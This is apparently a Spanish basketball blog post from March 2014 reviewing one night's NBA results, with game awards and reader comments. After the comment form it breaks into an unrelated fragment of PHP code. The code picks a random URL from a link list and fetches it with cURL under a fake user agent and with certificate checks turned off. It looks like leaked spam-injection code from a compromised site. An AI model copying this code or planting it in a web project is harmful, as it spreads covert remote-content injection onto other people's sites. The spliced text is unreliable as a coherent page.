La Crónica: Los Suns, de nuevo en playoffs

25 de March de 2014 por Simon

Los hemos dado por muertos una y mil veces, sobre todo cuando hace apenas una semana se encontraban con 2 partidos de desventaja,  pero una vez más nos han demostrado que estábamos equivocados. Los Suns han vuelto a ser capaces de remontar e igualar a unos Mavericks que están pasando por uno de sus peores momentos de juego de la temporada con un Nowitzki cansado y muy poco efectivo. La victoria que sumaron ayer en Atlanta los de Hornacek supone la cuarta consecutiva. Eric Bledsoe y Goran Dragic fueron los que lideraron, como es de costumbre, pero hasta 5 de sus hombres consiguieron dobles figuras en anotación lo que demuestra el juego coral que practican. Atlanta no pudo centrar sus esfuerzos en detener a ningun jugador específicamente y la victoria acabó siendo más cómoda de lo que indicó el marcador final (102-95). Los Hawks acumular la tercera derrota consecutiva y vuelven a meterse en líos.

El partido de la jornada sin duda era la visita de los Pacers a Chicago. Atendiendo al guión de los últimos meses pasó lo que tenía que pasar. Las defensas se impusieron a los ataques de principio a fin y los Bulls demostraron que a día de hoy están mucho mejor que unos Pacers que en ningún momento dieron la impresión de poder llevarse el partido (77-89). Joakim Noah borró del partido a Hibbert que apenas fue rival en el duelo directo y Taj Gibson se convirtió  en el hombre de la noche. En el duelo particular que mantienen los Pacers y los Heat por no acabar primeros de conferencia, ayer los de Miami dieron un gran paso adelante pues sumaron una victoria que les acerca a los líderes. Se enfrentaban a otro equipo sumido en una crisis de juego y resultado como son los Blazers. Lebron James anotó la canasta definitiva a falta de 11 segundos que ponía a los Heat por delante pero fue Bosh el verdadero héroe de la jornada al taponar la bandeja de Lillard que mandaba el partido a la prórroga (91-93). Sin embargo, los Blazers habían conseguido remontar una desventaja de 17 puntos en el último cuarto lo que aumenta las dudas que se ciernen sobre el momento de juego de los Heat. 

En cambio, los que no dejan dudas a día de hoy son los Spurs. Decimocuarta victoria consecutiva, la racha más larga de Greg Popovich en liga regular. El rival de ayer permitía ciertas licencias y por eso Splitter, Parker y Danny Green gozaron de una merecida jornada de descanso, no así Tim Duncan que ya había descansado la jornada anterior. Los Sixers perdieron su vigesimoquinto partido consecutivo lo que les coloca a una sola derrota de igualar la peor racha de la historia de la liga. Del partido hay poco que comentar puesto que san Antonio permitió pocas bromas y dominó el partido de principio a fin (91-113). Tampoco hicieron ninguna concesión el resto de equipos que ocupan el pódium del Oeste. Tanto Thunder como Clippers tenían partidos plácidos en su casa ante Nuggets y Bucks respectivamente. Oklahoma sentenció el partido en un primer cuarto de escándalo que terminaron con 17 puntos de ventaja,demasiado para unos Nuggets que a partir de ahí plantaron algo más de cara (96-117). Por su parte los Clippers tampoco tuvieron excesivas complicaciones para deshacerse de los Bucks. En el primer cuarto consiguieron abrir una pequeña distancia que les permitió ir todo el partido por delante a pesar de los tímidos intentos de los Bucks por remontar que apenas inquietaron a los de Doc Rivers (98-106).

Y todavía quedan varios partidos interesantes por comentar. En el que abría la jornada, los Rockets consiguieron vencer en la difícil cancha de los Bobcats gracias a un imparable James Harden que mantuvo a su equipo siempre por delante en la segunda mitad. Los Bobcats, a pesar de mantenerse cerca en el marcador, nunca pusieron en cuestión la victoria de Houston (100-89). Los que sí lograron una victoria plácida fueron los Grizzlies que sentenciaron el partido en el primer cuarto y poco más trabajo tuvieron ante los inofensivos Timberwolves (92-109). El partido más disputado de la noche lo protagonizaron los Nets en New Orleans. A pesar de una gran primera parte en la que Brooklyn llegó a mandar por más de 16 puntos los jóvenes Pelicans fueron capaces de reponerse e igualar el partido en la segunda mitad e incluso dispusieron de un tiro para ganar que falló Anthony Morrow. El partido se marchó a la prórroga en la que los locales ya no dieron opción ninguna y se llevaron la victoria (104-109). Para terminar, los Pistons rompieron una racha de 5 derrotas consecutivas venciendo a Utah Jazz a domicilio con su pareja interior como gran protagonista (114-94).

PREMIOS

MVP: Tyreke Evans no perdió nunca la fe y lideró la remontada de los Pelicans con 33 puntos, 10 rebotes y 7 asistencias.

Rookie: Generals Managers, jugadores de fantasys… Apuntaos el nombre de Gorgui Dieng que está cumpliendo sobradamente como center titular de los Wolves. Ayer fueron 11 puntos y 17 rebotes. Promedia 13,8 rebotes en los últimos 5 partidos.

Sorpresa: Austin Daye sólo había jugado 8 minutos con los Spurs desde que llegó al equipo el 20 de Febrero pero ayer era un buen día para darle minutos y el ex de los Raptors los aprovechó. Acabó con 22 puntos, con un 6 de 10 en triples,  6 rebotes, 2 robos y 2 tapones.

Decepción: El bache de los Pacers se personaliza en jugadores como Roy Hibbert que no levanta cabeza últimamente. Ayer fue totalmente superado por la energía del juego interior de los Bulls y sólo pudo anotar 3 puntos (0 de 5 en TC) y coger 5 rebotes.  Gary Neal fue un auténtico lastre para su equipo: falló los 8 tiros que intentó y no aportó en prácticamente ninguna faceta del juego.

Esfuerzo en vano: A Ramon Sessions le sienta muy bien jugar con los Bucks. No lo suficiente para cambiar la dinámica de un equipo perdedor pero sí para cujar buenas actuaciones como la de ayer. 28 puntos, 7 asistencias y 6 rebotes del ex de los Bobcats.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. dunc dice:
    #1

    Mis más sinceros respetos para los Suns al completo y a Hornacek en particular. Que meritazo. Coach of the Year YA!

      Citar

  2. Jose Luis dice:
    #2

    http://www.youtube.com/watch?v=xy2pkuhexIE#t=67

    ¿No os parece que se debería sancionar con técnica a todo el que invade zona restringida antes del lanzamiento?

    Entiendo que haya casos de dejar pasar la mano… pero hay algunos que son descaradísimos, así también evito yo que me capturen un posible rebote…

      Citar

  3. Esteban dice:
    #3

    quienes estan realizando un cierre de temporada fenomenal son los pelicans, quienes estan 30-40

    puede ser que ese record noi diga muchas cocas y a nadie asombre, pero si consideramos que han jugado casi todo el año sin Anderson (cuando jugoi estaba en 20 ppp), y menos aun con ason Smith (no es un crack pero era lo mas parecido a un pivote que tenian), han perdido muchiismos juegos a Holiday (su base all star), y ultimamente, en menor medida pero tambien ha faltado Eric Gordon

    si estuvieran todos sanos, deberian estar peleando por PO

      Citar

  4. The Wolf dice:
    #4

    Jose Luis:
      

    Tambien es que la forma de tirar de Jermaine… parece que lo hace queriendo el tio para reirse de la gente

      Citar

  5. Nacho dice:
    #5

    Esteban:

    si estuvieran todos sanos, deberian estar peleando por PO

    Esteban tío, estamos hablando del oeste, mira como están los PO.
    En el este no te digo que no.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>